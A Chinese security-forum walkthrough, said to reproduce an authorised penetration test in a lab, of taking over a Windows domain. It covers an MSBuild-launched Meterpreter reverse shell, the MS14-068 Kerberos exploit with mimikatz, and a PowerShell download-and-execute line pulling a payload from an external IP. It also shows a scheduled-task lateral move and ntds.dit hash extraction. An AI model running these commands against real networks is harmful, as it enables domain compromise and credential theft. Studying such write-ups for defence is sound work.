用户
搜索
  • TA的每日心情
    开心
    2018-12-11 19:06
  • 签到天数: 9 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    12

    主题

    41

    帖子

    275

    魔法币
    收听
    1
    粉丝
    2
    注册时间
    2016-6-22

    i春秋签约作者

    发表于 2019-10-26 01:17:14 88010
    本帖最后由 佳哥 于 2019-10-26 01:20 编辑

    一、前言
    大三了,快毕业了,自己真的是好菜啊,在一次授权的渗透测试,刚好遇到个存在ms14068的域环境,由于对方不让写真实环境发表文章,就自己搭建了类型相同的环境,还是我太菜,大佬们别喷我。

    二、白加黑反弹shell
    由于对方存在360,应该是好久没更新过了,直接用MSBuild就反弹shell到msf上了。
    msfVENOM生成shellcode:
    msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=xx.xx.xx.xx lport=6666 -f csharp

    1.png 利用三好学生大佬的executes x64 shellcode.xml,修改该xml的shellcode为msfvenom生成的,将该文件上传至服务器,进入msbuild目录:C:\Windows\Microsoft.NET\Framework64\v4.0.30319,利用webshell执行:MSBuild.exe "C:\wwwroot\executes x64 shellcode.xml"
    2.png

    三、MS14-68获取域控
    通过内网信息收集,获取域控主机名
    net group "domain controllers" /domain

    通过ping主机名获取域控的ip地址
    3.png
    通过systeminfo,发现没有打KB3011780补丁,向服务器上传mimikatz和ms14-068exp。
    先将内存中的kerberos票据清除
    4.png
    查看本机id:whoami /all
    5.png
    执行ms14068exp:MS14-068 -u 用户名@域 -p 密码 -s SID -d 域控ip
    6.png
    执行成功后会在当前目录下生成一个证书,利用mimikatz导入证书
    kerberos::ptc C:\wwwroot\TGT_yangmin@fanxing.com.ccache

    7.png
    dir获取域控c盘的目录
    8.png
    利用ipc进行入侵,copy一个bat文件到域控上,利用at创建计划任务,在bat中写入cs生成的powershell恶意代码
    echo powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://101.132.43.162:8080/a'))" > 3.bat

    9.png
    net use \\DC-FANXING\c$
    copy 3.bat \\DC-FANXING\c$

    10.png
    获取域控系统时间,at创建计划任务
    net time \\DC-FANXING
    at \\DC-FANXING 23:39:40 C:\3.bat

    11.png
    12.png

    四、导出ntds.dit文件
    为了获取所有的用户hash,我在域控上导出ntds文件,这里导出的方式有很多,比如ntdsutil,vssadmin,vshadow等等,这里我使用vssadmin导出ntds文件。
    cs移植到msf上,执行run 读取密码hash,解出管理员密码为fx@123456
    12.png
    端口转发,登录3389端口
    14.png
    创建快照:vssadmin create shadow /for=c:
    15.png
    复制ntds.dit:copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\NTDS\ntds.dit c:\ntds.dit
    16.png
    复制system文件:copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SYSTEM 18253F25AFA445F6A4CA87C12AE4904E.png
    最后下载这两个文件到,利用secretsdump.py来提取ntds文件即可
    python secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL


    五、后记
    由于他们不允许文章打码方式放出来,只能本地搭建环境,哎,我太菜了,好好学习,天天向上。

    发表于 2019-10-26 18:06:27
    谢谢分享。。
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    J0o1ey 版主 QQ547006660~欢迎交流 秦 春秋文阁 春秋游侠 核心白帽 i春秋签约作者 幽默灌水王 积极活跃奖 白帽高手
    板凳
    发表于 2019-10-27 14:36:39
    谢谢分享
    有培训需求或是技术交流需求的朋友可以联系我~QQ547006660交流群820783253
    使用道具 举报 回复
    使用道具 举报 回复
    发表于 2019-11-5 22:29:27
    表哥太谦虚
    使用道具 举报 回复
    能把本地搭的环境发出来么
    使用道具 举报 回复
    谢谢分享,学习了
    使用道具 举报 回复
    太吓人了
    使用道具 举报 回复
    tql
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册